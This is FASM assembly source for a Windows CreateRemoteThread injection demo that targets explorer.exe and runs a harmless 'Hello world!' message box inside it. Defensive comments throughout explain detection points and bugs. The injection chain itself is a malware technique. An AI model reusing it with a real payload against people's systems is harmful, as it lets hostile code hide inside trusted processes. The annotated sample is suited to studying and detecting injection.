; -=-=-=-=-=-=-=-=-=-=-=-=-=-
; Code injection in FASM
; Created by Ct757
; -=-=-=-=-=-=-=-=-=-=-=-=-=-
;
; Use FASM to compile this shit
;
; Reviewer notes (a defender's reading of this sample):
;   Syntax/target: FASM, Intel syntax, 32-bit PE. Win32 calls go through the
;   `invoke` macro from win32a.inc (stdcall: arguments pushed right-to-left,
;   call through the import table); the APIA includes bind the ANSI exports.
;   Technique: the textbook CreateRemoteThread injection chain --
;   CreateToolhelp32Snapshot/Process32First/Process32Next to find the PID,
;   then OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
;   CreateRemoteThread. That exact API sequence is what Sysmon Event ID 8
;   (CreateRemoteThread) and behavioural EDR rules are commonly keyed on;
;   nothing in the sample tries to hide it.
;   Static indicators: one section flagged readable+writeable+executable
;   (code, the PROCESSENTRY32 buffer and the patched pointer table all share
;   it), the literal 'explorer.exe', and the blob strings 'USER32.DLL',
;   'Hello world!' and 'Injected'.

format PE GUI 4.0                       ; 32-bit, GUI subsystem: no console window
entry start
include '%fasminc%\win32a.inc'

; Everything -- code, mutable data and the injected blob -- lives in a single
; RWX section (W^X violation; a cheap static-analysis red flag).
section '.code' code readable writeable executable

target_name db 'explorer.exe',0         ; process name matched (case-insensitively) by find_target

;...............[INJECT CODE]..................;
; Position-independent blob: the bytes from remote_thread up to thread_end are
; copied verbatim into the target process and started there as a thread.
; Layout: code first, then the two API pointer slots and the strings it uses.
; The slots are filled by get_apis in THIS process before the copy, so the
; blob only works if kernel32/user32 are mapped at the same base in the
; target -- nothing is resolved on the remote side.
; Behaviour: LoadLibrary('USER32.DLL'), then
; MessageBox(NULL, 'Hello world!', 'Injected', 0); the MessageBox result in
; eax becomes the thread's exit code.
; Register roles: ebp = relocation delta (runtime address - link-time
; address), esi = 0 (reused for every NULL / 0 argument).
remote_thread:
        call    .delta
.delta:
        pop     ebp                     ; ebp = runtime address of .delta
        sub     ebp,.delta              ; ebp = delta; [ebp+sym] addresses sym wherever the blob was copied
        xor     esi,esi
        lea     eax,[ebp+_user32]
        push    eax                     ; lpLibFileName
        call    [ebp+pLoadLibrary]      ; LoadLibrary('USER32.DLL')
        push    esi                     ; uType = 0
        lea     eax,[ebp+_title]
        push    eax                     ; lpCaption
        lea     eax,[ebp+_message]
        push    eax                     ; lpText
        push    esi                     ; hWnd = NULL
        call    [ebp+pMessageBox]       ; MessageBox(NULL, 'Hello world!', 'Injected', 0)
        ret                             ; thread exit code = MessageBox return value
.data:
pMessageBox dd 0                        ; patched by get_apis before the blob is copied
pLoadLibrary dd 0                       ; patched by get_apis before the blob is copied
_user32 db 'USER32.DLL',0
_message db 'Hello world!',0
_title db 'Injected',0
thread_end:
;...............[END INJECT CODE]..............;

; Static PROCESSENTRY32 filled by the Toolhelp calls below (lives in the
; writable code section; shared, so find_target is not re-entrant).
p_ent PROCESSENTRY32

;-----------------------------------------------------------------------
; find_target -- DWORD find_target(void)
; Walks a TH32CS_SNAPPROCESS snapshot and returns the PID of the first
; process whose szExeFile equals target_name (lstrcmpi: case-insensitive).
; Out:    eax = th32ProcessID, or 0 when the snapshot fails or nothing matches
; Clobb:  eax, ecx, edi (snapshot handle), esi (= 0), flags; plus API clobbers
; Note:   only the .found path closes the snapshot handle; when the list is
;         exhausted the handle in edi leaks (harmless here only because the
;         process exits right afterwards).
;-----------------------------------------------------------------------
find_target:
        xor     esi,esi
.shot:                                  ; (label is not referenced anywhere)
        mov     [p_ent.dwSize],sizeof.PROCESSENTRY32   ; Toolhelp requires dwSize to be set before Process32First
        invoke  CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,esi   ; th32ProcessID argument is ignored for this flag
        inc     eax                     ; INVALID_HANDLE_VALUE (-1) becomes 0 ...
        je      .not_found              ; ... so ZF set means the snapshot failed
        dec     eax                     ; restore the handle value
        xchg    eax,edi                 ; edi = snapshot handle
        invoke  Process32First,edi,p_ent
.next_prc:
        xchg    eax,ecx                 ; ecx = BOOL from Process32First/Next
        jecxz   .not_found              ; FALSE: end of list (or error)
        invoke  lstrcmpi,p_ent.szExeFile,target_name
        xchg    eax,ecx
        jecxz   .found                  ; lstrcmpi returned 0 -> names are equal
        invoke  Process32Next,edi,p_ent
        jmp     .next_prc
.found:
        invoke  CloseHandle,edi
        mov     eax,[p_ent.th32ProcessID]
        ret
.not_found:
        xor     eax,eax
        ret

;-----------------------------------------------------------------------
; inject_code -- void inject_code(DWORD pid)
; In:     eax = PID returned by find_target
; Out:    nothing meaningful (eax = whatever the last API call returned)
; Clobb:  eax, ecx, edi (process handle), ebp (remote buffer; ebp is used as a
;         plain register here, there is no frame), esi (= 0), flags
; Flow:   OpenProcess -> VirtualAllocEx -> WriteProcessMemory ->
;         CreateRemoteThread, bailing to .close_h / .exit on the first
;         NULL / FALSE result.
; Notes:  the remote region is requested PAGE_READWRITE, i.e. without execute
;         permission, which DEP enforces; the thread handle returned by
;         CreateRemoteThread is never closed; on the WriteProcessMemory
;         failure path the remote allocation is not released (no
;         VirtualFreeEx).
;-----------------------------------------------------------------------
inject_code:
        xor     esi,esi
        invoke  OpenProcess,PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,esi,eax   ; bInheritHandle = FALSE, dwProcessId = eax
        xchg    eax,ecx
        jecxz   .exit                   ; NULL handle: bad PID or insufficient rights
        xchg    ecx,edi                 ; edi = hProcess
        invoke  VirtualAllocEx,edi,esi,thread_end-remote_thread,MEM_COMMIT,PAGE_READWRITE   ; lpAddress = NULL, size = blob length
        xchg    eax,ecx
        jecxz   .close_h                ; allocation failed
        xchg    ecx,ebp                 ; ebp = remote base address
        invoke  WriteProcessMemory,edi,ebp,remote_thread,thread_end-remote_thread,esi       ; copy the blob; lpNumberOfBytesWritten = NULL
        dec     eax                     ; BOOL result: only a return of exactly 1 ...
        test    eax,eax
        jnz     .close_h                ; ... is treated as success
        inc     eax                     ; restores eax = 1; has no effect (next invoke overwrites eax)
        invoke  CreateRemoteThread,edi,esi,esi,ebp,ebp,esi,esi  ; lpStartAddress = remote base, lpParameter = remote base; handle is dropped
.close_h:
        invoke  CloseHandle,edi
.exit:
        ret

;-----------------------------------------------------------------------
; get_apis -- void get_apis(void)
; Copies this process's import-table entries for LoadLibrary and MessageBox
; (ANSI variants per the APIA includes) into the blob's pointer slots so the
; remote thread can call them without resolving anything itself.
; Assumes kernel32/user32 are mapped at the same base in the target process.
; Clobb:  edi
;-----------------------------------------------------------------------
get_apis:
        mov     edi,[LoadLibrary]       ; resolved address read from the IAT slot
        mov     [pLoadLibrary],edi
        mov     edi,[MessageBox]
        mov     [pMessageBox],edi
        ret

;-----------------------------------------------------------------------
; start -- entry point
; find_target -> (only if a PID was found) get_apis, inject_code ->
; ExitProcess(0). get_apis must run before inject_code because inject_code
; copies the blob, pointer slots included, into the target.
;-----------------------------------------------------------------------
start:
        call    find_target
        test    eax,eax
        je      .exit                   ; 0: target not running or snapshot failed
        call    get_apis
        call    inject_code             ; eax still holds the PID (get_apis only touches edi)
.exit:                                  ; local to start; distinct from inject_code.exit
        push    0
        call    [ExitProcess]

section '.idata' data import readable

library kernel32,'KERNEL32.DLL',\
        user32,'USER32.DLL'

include '%fasminc%\APIA\kernel32.inc'
include '%fasminc%\APIA\user32.inc'